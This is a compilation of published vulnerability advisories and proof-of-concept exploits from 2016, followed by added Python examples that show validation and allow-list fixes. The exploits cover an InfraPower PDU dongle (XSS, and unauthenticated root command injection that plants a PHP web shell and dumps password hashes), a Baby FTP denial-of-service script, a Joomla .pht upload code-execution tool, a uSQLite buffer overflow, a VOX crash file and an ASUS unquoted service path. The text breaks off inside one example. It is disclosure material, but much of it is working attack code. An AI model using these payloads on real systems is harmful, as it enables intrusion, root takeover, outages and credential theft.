InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient client application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5369
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
27.09.2016
--
#################################################################################
GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1
#################################################################################
POST /FWUpgrade.php HTTP/1.1
Host: 192.168.0.17
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
Connection: close
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"
Content-Type: text/php
t00t
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="upfile"
somefile.php
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="ID_Page"
Firmware.php?Menu=FRM
------WebKitFormBoundary207OhXVwesC60pdh--
#################################################################################
POST /SNMP.php?Menu=SMP HTTP/1.1
Host: 192.168.0.17
SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
#################################################################################
lqwrm@zslab:~#
lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
-------------------------------------------------
PHP Source Code Security Scanner v0.2
(c) Zero Science Lab - http://www.zeroscience.mk
Tue Sep 27 10:35:52 CEST 2016
-------------------------------------------------
Scanning recursively...Done.
dball.php:
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
doupgrate.php:
Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 15: Command Injection in 'system' via '$_POST'
Line 16: Command Injection in 'system' via '$_POST'
Line 19: Command Injection in 'system' via '$_POST'
Firmware.php:
Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
Function.php:
Line 257: Header Injection in 'header' via '$_SERVER'
Line 267: Header Injection in 'header' via '$_SERVER'
FWUpgrade.php:
Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
index.php:
Line 2: Header Injection in 'header' via '$_SERVER'
IPSettings.php:
Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Line 117: Command Injection in 'exec' via '$IP_setting'
Line 117: Command Injection in 'exec' via '$Netmask_setting'
Line 123: Command Injection in 'exec' via '$Gateway_setting'
ListFile.php:
Line 12: PHP File Inclusion in 'fgets' via '$fp'
Login.php:
Line 151: Command Injection in 'shell_exec' via '$_POST'
Ntp.php:
Line 46: Command Injection in 'exec' via '$idx'
OutletDetails.php:
Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
PDUStatus.php:
Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
production_test1.php:
Line 6: Command Injection in 'shell_exec' via '$_POST'
Line 45: Command Injection in 'proc_open' via '$_ENV'
SensorDetails.php:
Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
SensorStatus.php:
Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
SNMP.php:
Line 41: Command Injection in 'exec' via '$_POST'
System.php:
Line 54: Header Injection in 'header' via '$_SERVER'
Line 64: Header Injection in 'header' via '$_SERVER'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 185: Command Injection in 'exec' via '$TimeServer'
Line 286: Command Injection in 'exec' via '$IP_setting'
Line 286: Command Injection in 'exec' via '$Netmask_setting'
Line 292: Command Injection in 'exec' via '$Gateway_setting'
UploadEXE.php:
Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 82: Command Injection in 'popen' via '$_FILES'
Line 96: PHP File Inclusion in 'fgets' via '$fp'
Line 96: PHP File Inclusion in 'fgets' via '$buffer'
WriteRequest.php:
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
-----------------------------------------------------
Scan finished. Check results in scan_output.txt file.
lqwrm@zslab:~#
InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient client application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple unauthenticated remote command
injection vulnerabilities. They exist because several POST parameters in
several scripts are passed unsanitized to the exec(), proc_open(), popen()
and shell_exec() PHP functions while updating settings on the affected
device. This allows an attacker to execute arbitrary system commands as the
root user and to bypass the access controls in place.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5372
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php
27.09.2016
--
doupgrate.php:
--------------
09: <?
10: echo "Firmware Upgrate Using NFS:<BR>";
11: echo "IP=".$_POST["ipaddr"]."<BR>";
12: echo "Firmware Name=".$_POST["fwname"]."<BR>";
13: system("sh nfs.sh");
14: echo "Mounting NFS<BR>";
15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
16: system("cp /nfs/".$_POST["fwname"]." /");
17: echo "Flash erasing<BR>";
18: system("@flash_eraseall /dev/mtd0");
19: system("cp /".$_POST["fwname"]." /dev/mtd0");
20: echo "Upgrate done<BR>";
21: system("umount /nfs");
22: echo "Reboot system<BR>";
23: system("reboot");
24: ?>
---------------------------------------------------------------------
IPSettings.php:
---------------
83: $IP_setting = ereg_ip($_POST['IP']);
84: $Netmask_setting = ereg_ip($_POST['Netmask']);
85: $Gateway_setting = ereg_ip($_POST['Gateway']);
...
...
110: $fout = fopen("/mnt/mtd/net_conf", "w");
111: if($fout){
112: $output = substr($output, 0, -1);
113: fprintf($fout, "%s", $output);
114: //echo $change_ip.'b';
115: if($change_ip === '1'){
116: $str = '';
117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
118: // echo $str."\n";
119: }
120: if($change_gw === '1'){
121: $str = '';
122: exec('ip route del default', $str);
123: exec('route add default gw '.$Gateway_setting, $str);
124: // echo $str[0]."a\n";
125: }
126: }
127: fclose($fout);
...
...
164: function ereg_ip($ipstring){
165: $ipstring=trim($ipstring); //strip leading/trailing whitespace
166: //malformed input
167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
168: //range check
169: $ip_segment =split("\.",$ipstring); //the "\" is required, otherwise the split does not work
170: foreach($ip_segment as $k =>$v){
171: if($v >255){
171: return 0;
172: }
173: $ip_segment[$k]=(int)$ip_segment[$k]; //strip leading zeros, e.g. 1.020.003.004 => 1.20.3.4
174: } //end foreach
175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //rebuild the $ip string
176: return $ipstring;
177: }
---------------------------------------------------------------------
Login.php:
----------
126: $UserName = getConf("/mnt/mtd/web_conf", "UserName");
127: $Password = getConf("/mnt/mtd/web_conf", "Password");
128:
129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
...
...
140: $_SESSION['Login'] = $_POST['ID_User'];
141:
142: //Login
143: $loginTime = date("Y-m-d,H:i:s.0,P");
144: $remoteIP = $_SERVER['REMOTE_ADDR'];
145: //----------SNMP checking ---Ed 20130307------------------------<
146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
147: if ($SNMPEnable == "1") {
148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
149: if ($TrapEnable == "v2Trap") {
150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
152: //echo "alert($res);";
153: }
154: }
---------------------------------------------------------------------
Ntp.php:
--------
36: <?php
37: if(empty($_POST['Change']))
38: $tzone='8';
39: else
40: {
41:
42: $tzone=$_POST['ID_timezone'];
43: $idx=$tzone+12;
44: echo "update status...";
45: exec("/usr/bin/ntpclient -s -h 220.130.158.71");
46: exec("/usr/bin/zonegen ".$idx);
47: exec("/usr/bin/zic -d /usr/bin/ zonetime");
48: exec("mv /usr/bin/localtime /etc/localtime");
49: echo "OK";
50: }
51: ?>
---------------------------------------------------------------------
production_test1.php:
---------------------
4: if( isset($_POST['macAddress']) )
5: {
6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
7: $mac = shell_exec("cat /mnt/mtd/mac_addr");
8: /*$result = $fail;
9: echo $mac . ",";
10: echo $_POST['macAddress'];
11: if( !strcmp($mac,$_POST['macAddress']) )
12: $result = $success;
13: echo "verify - " . $mac . " - " . $result;*/
14: echo "verify - " . $mac;
15:
16: exit();
17: }
---------------------------------------------------------------------
SNMP.php:
---------
34: if($_POST["SNMPAgent"] === "Enable"){
35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
36: setConf("/mnt/mtd/snmp_conf", "enable", "1");
37:
38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
39: {
40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
43: setSnmpConf(1,$_POST["CommuintyString"]);
44: setSnmpConf(2,$_POST["CommuintyWrite"]);
45: $pCommunity = $_POST["CommuintyString"];
46: }
---------------------------------------------------------------------
System.php:
-----------
86: if(!empty($_POST['ChangeTime']) == "1"){
87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
88:
89: //Ray modify
90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
92:
93:
94: if(isset($_POST['TimeZone'])){
95: setTimeZone($_POST['TimeZone']);
96: $orgZone = $_POST['TimeZone'];
97: }
98:
99: exec('date '.$datetime);
100: exec('hwclock -w');
101: exec('hwclock -w -f /dev/rtc1');
...
...
180: if(isset($_POST['TimeServer'])){
181: //$TimeServer = ereg_ip($_POST['TimeServer']);
182: if(!empty($_POST['TimeServer'])){
183: $TimeServer = $_POST['TimeServer'];
184:
185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1");
...
...
286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
...
...
292: exec('route add default gw '.$Gateway_setting, $str);
...
...
336: function ereg_ip($ipstring){
337: $ipstring=trim($ipstring); //strip leading/trailing whitespace
338: //malformed input
339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
340: //range check
341: $ip_segment =split("\.",$ipstring); //the "\" is required, otherwise the split does not work
342: foreach($ip_segment as $k =>$v){
343: if($v >255){
344: return 0;
345: }
346: $ip_segment[$k]=(int)$ip_segment[$k]; //strip leading zeros, e.g. 1.020.003.004 => 1.20.3.4
347: } //end foreach
348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //rebuild the $ip string
349: return $ipstring;
350: }
---------------------------------------------------------------------
UploadEXE.php:
--------------
72: if(isset($_POST['hasFile'])){
73: if ($_FILES['ExeFile']['error'] > 0){
74: echo 'Error: ' . $_FILES['FW']['error'];
75: }else{
76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>';
...
...
80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");
---------------------------------------------------------------------
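The excerpts above show the same device using two different approaches: the IP fields go through ereg_ip(), an anchored digits-and-dots allow-list, before reaching exec(), while TimeServer (System.php line 181, where the ereg_ip() call is commented out), macAddress and CommuintyString are concatenated raw. The following Python is an added example, not the advisory's or the vendor's code: a port of ereg_ip(), a hostname allow-list of the kind line 181 needs, and a POSIX-style tokeniser that shows how many commands the shell actually runs for the string production_test1.php line 6 builds, with and without quoting. The payloads are the ones from the advisory's PoCs; everything else is constructed for illustration.

```python
"""Added example, not part of the advisory or the InfraPower firmware."""
import re
import shlex

_IPV4_RE = re.compile(r"^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$")
# Allow-list for hostname-or-IP fields such as TimeServer: letters, digits,
# dots and hyphens only, no leading hyphen (so the value can never be read as
# an ntpclient option) and no shell metacharacters at all.
_HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")
_SEPARATORS = {";", "|", "||", "&", "&&"}


def ereg_ip(ipstring):
    """Port of ereg_ip() from IPSettings.php / System.php.

    Returns the dotted quad with leading zeros stripped, or 0 (as the PHP
    does) when the input is not exactly four octets of 0-255.  Because the
    regex is anchored and admits only digits and dots, nothing reaching the
    ifconfig/route calls on lines 117, 123, 286 and 292 can contain a shell
    metacharacter, even though those lines concatenate straight into exec().
    """
    ipstring = ipstring.strip()
    if not _IPV4_RE.match(ipstring):
        return 0
    octets = [int(v) for v in ipstring.split(".")]
    if any(v > 255 for v in octets):
        return 0
    return ".".join(str(v) for v in octets)


def validate_timeserver(value):
    """What System.php line 181 should do instead of passing the raw
    $_POST['TimeServer'] to ntpclient: return the value if it is a plain
    hostname or IP literal, otherwise None."""
    value = value.strip()
    return value if _HOST_RE.match(value) else None


def shell_tokens(cmd):
    """Tokenise cmd the way a POSIX shell would, with ; | & > as their own tokens."""
    lex = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lex.wordchars += ":"      # keep MAC-style values such as ZE:RO:SC in one token
    return list(lex)


def shell_commands(cmd):
    """Split a command line into the separate argv lists the shell would run."""
    commands, current = [], []
    for tok in shell_tokens(cmd):
        if tok in _SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def vulnerable_mac_command(mac):
    """production_test1.php line 6: raw concatenation handed to shell_exec()."""
    return "echo " + mac + " > /mnt/mtd/mac_addr"


def hardened_mac_command(mac):
    """Same command with the client value quoted (PHP equivalent:
    escapeshellarg()), so the whole string becomes one argument to echo."""
    return "echo " + shlex.quote(mac) + " > /mnt/mtd/mac_addr"


if __name__ == "__main__":
    payload = "ZE:RO:SC:IE:NC:E0;cat /etc/passwd"   # PoC #2 below
    print(shell_commands(vulnerable_mac_command(payload)))
    print(shell_commands(hardened_mac_command(payload)))
    print(ereg_ip("192.168.0.254';alert(3)//"), validate_timeserver("1.2.3.4;reboot"))
```

The tokeniser is only a model of the shell (it does not expand `$(...)` or backticks), but it is enough to show that the unquoted string yields two commands and the quoted one yields a single echo with the payload as its argument; the real fix is to pass an argv list (proc_open with an array, or subprocess without shell) rather than to quote.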
#1
--
PoC Request:
curl -i -s -k -X 'POST' \
-H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
'https://192.168.0.17/SNMP.php?Menu=SMP'
...
curl -k 'https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a'
Response:
root
at
Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown
#2
--
PoC Request:
POST /production_test1.php HTTP/1.1
Host: 192.168.0.17
User-Agent: ZSL-Injectinator/3.1 (Unix)
Content-Type: application/x-www-form-urlencoded
Connection: close
macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd
Response:
HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.9
Content-type: text/html
Connection: close
Date: Fri, 17 Jan 2003 16:58:52 GMT
Server: lighttpd/1.4.30-devel-1321
Content-Length: 751
verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
#!/usr/bin/env python3
### Baby FTP 1.24 - Denial of Service by n30m1nd ###
# Date: 2016-10-27
# PoC Author: n30m1nd
# Vendor Homepage: http://www.pablosoftwaresolutions.com/
# Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
# Version: 1.24
# Tested on: Win7 64bit and Win10 64 bit
# Credits
# =======
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
# How to
# ======
# * Run this python script and write the IP to attack.
# Why?
# ====
# The FTP Server can't handle more than ~1505 connections at the same time
# Exploit code
# ============
import socket

ip = input("[+] IP to attack: ")
sarr = []   # keep every socket open so the server's connection table never drains
i = 0
while True:
    try:
        sarr.append(socket.create_connection((ip, 21)))
        print("[+] Connection %d" % i)
        # log in on each connection so the server allocates a full session for it
        sarr[i].send(b"USER anonymous\r\n")
        sarr[i].recv(4096)
        sarr[i].send(b"PASS n30m1nd\r\n")
        sarr[i].recv(4096)
        i += 1
    except socket.error:
        print("[*] Server crashed!!")
        input()
        break
Source: https://github.com/XiphosResearch/exploits/tree/master/Joomraa
While analysing the recent Joomla exploit in com_users:user.register we came across a problem with the upload whitelisting. They don't allow files containing <?php, or with the extensions .php and .phtml, but they do allow <?= and .pht files, which works out of the box on most hosting environments, including the standard Ubuntu LAMP install, as per:
<FilesMatch ".+\.ph(p[345]?|t|tml)$">
SetHandler application/x-httpd-php
</FilesMatch>
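The mismatch is between what the upload filter denies and what the web server will execute. The following Python is an added example, not code from the Joomraa repository or from Joomla: it evaluates the Apache FilesMatch pattern quoted above against a reconstructed deny-list of the kind the text describes (reject .php and .phtml names and bodies containing `<?php`), lists the uploads that pass the deny-list yet run as PHP, and contrasts it with an extension allow-list. It goes slightly beyond the text by including .php5, which the same pattern also executes. The sample uploads are constructed.

```python
"""Added example, not part of the Joomraa project or Joomla."""
import re

# Apache FilesMatch pattern from the stock Ubuntu LAMP config (PCRE, case-sensitive).
APACHE_PHP_HANDLER = re.compile(r".+\.ph(p[345]?|t|tml)$")

# Assumed reconstruction of the deny-list described above, not Joomla's code.
DENIED_EXTENSIONS = {"php", "phtml"}
DENIED_CONTENT = (b"<?php",)
# An allow-list alternative for an image upload endpoint.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif"}

# Constructed sample uploads: (file name, first bytes of the body).
SAMPLE_UPLOADS = [
    ("exploit.php", b"<?php system($_GET['c']); ?>"),
    ("exploit.phtml", b"<?= system($_GET['c']); ?>"),
    ("exploit.pht", b"<?= system($_GET['c']); ?>"),    # the case Joomraa uses
    ("exploit.php5", b"<?= system($_GET['c']); ?>"),
    ("exploit.PHP", b"<?= 1 ?>"),
    ("avatar.png", b"\x89PNG\r\n\x1a\n"),
]


def extension(filename):
    return filename.rsplit(".", 1)[-1].lower() if "." in filename else ""


def denylist_accepts(filename, content):
    """Upload passes if neither the extension nor the body hits the deny-list."""
    if extension(filename) in DENIED_EXTENSIONS:
        return False
    return not any(marker in content for marker in DENIED_CONTENT)


def allowlist_accepts(filename, content):
    """Upload passes only if the extension is one we positively expect."""
    return extension(filename) in ALLOWED_EXTENSIONS


def apache_executes(filename):
    """True when the stock handler rule would hand this file to PHP."""
    return APACHE_PHP_HANDLER.match(filename) is not None


def bypasses(samples, accepts):
    """Names that `accepts` lets through but Apache executes as PHP."""
    return [name for name, body in samples if accepts(name, body) and apache_executes(name)]


if __name__ == "__main__":
    print("deny-list gap :", bypasses(SAMPLE_UPLOADS, denylist_accepts))
    print("allow-list gap:", bypasses(SAMPLE_UPLOADS, allowlist_accepts))
```

The deny-list misses every alias the handler accepts that the list author did not think of; the allow-list has no such gap because it never mentions PHP at all.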
Usage
Choose the username, password and e-mail address to use and point it at the URL for your Joomla website. Use the -x and -s options to customise exploit behaviour, -s searches for the given string in the output after running the PHP file (specified in -x), an example is provided which proves remote code execution.
$ ./joomraa.py -u hacker -p password -e hacker@example.com http://localhost:8080/joomla
(JOOMRAA ASCII-art banner)
[-] Getting token
[-] Creating user account
[-] Getting token for admin login
[-] Logging in to admin
[+] Admin Login Success!
[+] Getting media options
[+] Setting media options
[*] Uploading exploit.pht
[*] Uploading exploit to: http://localhost:8080/joomla/images/OGBUHCF5F.pht
[*] Calling exploit
[$] Exploit Successful!
[*] SUCCESS: http://localhost:8080/joomla
Full Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40637.zip
#!/usr/bin/env python3
# Exploit Title: Remote buffer overflow vulnerability in uSQLite 1.0.0 PoC
# Date: 27/10/2016
# Exploit Author: Peter Baris
# Software Link: https://sourceforge.net/projects/usqlite/?source=directory
# Version: 1.0.0
# Tested on: windows 7 and XP SP3
# Longer strings will cause heap based overflow
# usage: python usqlite.py <host address>
# Output in the debugger
# EAX 0000038C
# ECX 00B0DA10
# EDX 0000038C
# EBX 41414141
# ESP 0028F8D0 ASCII "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
# EBP 41414141
# ESI 41414141
# EDI 41414141
# EIP 42424242 <-- EIP is under control, but depending on the OS version, you might have issues finding a jump spot without DEP and ASLR.
###############################################################################################################################################
import socket
import sys

if len(sys.argv) <= 1:
    print("Usage: python usqlite.py hostname")
    sys.exit()

hostname = sys.argv[1]
port = 3002
# 259 bytes of padding (the A's that land in EBX/EBP/ESI/EDI), 4 bytes that
# overwrite the saved return address (the B's in EIP), then filler that ESP
# points at after the return (the C's).
buffer = b"A" * 259 + b"B" * 4 + b"C" * 360

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((hostname, port))
sock.send(buffer + b"\r\n")
sock.recv(1024)
sock.close()
# Exploit Title: VOX Music Player 2.8.8 '.pls' Local Crash PoC
# Date: 10-12-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://coppertino.com/vox/mac/
# Software Link: http://dl.devmate.com/com.coppertino.Vox/Vox.dmg
# Version: 2.8.8
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
# The playlist is built as bytes so the script runs under Python 2 and 3 alike.
evil = b'\x90'
# File1 is followed directly by the 0x90 byte, exactly as in the original PoC.
pls = b'[playlist]\n' + b'NumberOfEntries=1\n' + b'File1' + evil + b'\n' + b'Title1=\n' + b'Length1=-1\n'
with open('Local_Crash_PoC.pls', 'wb') as f:
    f.write(pls)
# Exploit Title: ATKGFNEXSrv ATKGFNEX- Privilege Escalation Unquoted Service Path vulnerability
# Date: 13/10/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: www.asus.com
# Version: 1.0.11.1
# Tested on: Windows 7 x64 SP1 (but it should work on all Windows versions)
The application suffers from an unquoted service path issue affecting the service 'ATKGFNEXSrv (GFNEXSrv.exe)' deployed as part of ATKGFNEX.
This could allow an authorized but non-privileged local user to execute arbitrary code with SYSTEM privileges.
POC :
C:\Users\Utilisateur>sc qc "ATKGFNEXSrv"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: ATKGFNEXSrv
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
LOAD_ORDER_GROUP : ShellSvcGroup
TAG : 0
DISPLAY_NAME : ATKGFNEX Service
DEPENDENCIES : ASMMAP64
SERVICE_START_NAME : LocalSystem
Additional notes :
https://hackerone.com/blog/asus-vulnerability-disclosure-deja-vu
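The sc qc output above shows why the path matters: BINARY_PATH_NAME contains spaces and is not wrapped in quotes, so when the service starts as LocalSystem the loader tries each space-delimited prefix as an executable before it reaches GFNEXSrv.exe. The following Python is an added example, not part of the advisory: it parses sc qc output, decides whether the path is exploitable, and lists the candidate executables in the order Windows tries them, which is exactly the set of locations a low-privileged user would need write access to. The sample output is reconstructed from the advisory with English labels; whether any of those directories is actually writable has to be checked on the host (for instance with icacls).

```python
"""Added example, not part of the original advisory."""
import re

# Constructed sample: the `sc qc "ATKGFNEXSrv"` output from the advisory.
SAMPLE_SC_QC = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ATKGFNEXSrv
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\ATK Package\ATKGFNEX\GFNEXSrv.exe
        LOAD_ORDER_GROUP   : ShellSvcGroup
        TAG                : 0
        DISPLAY_NAME       : ATKGFNEX Service
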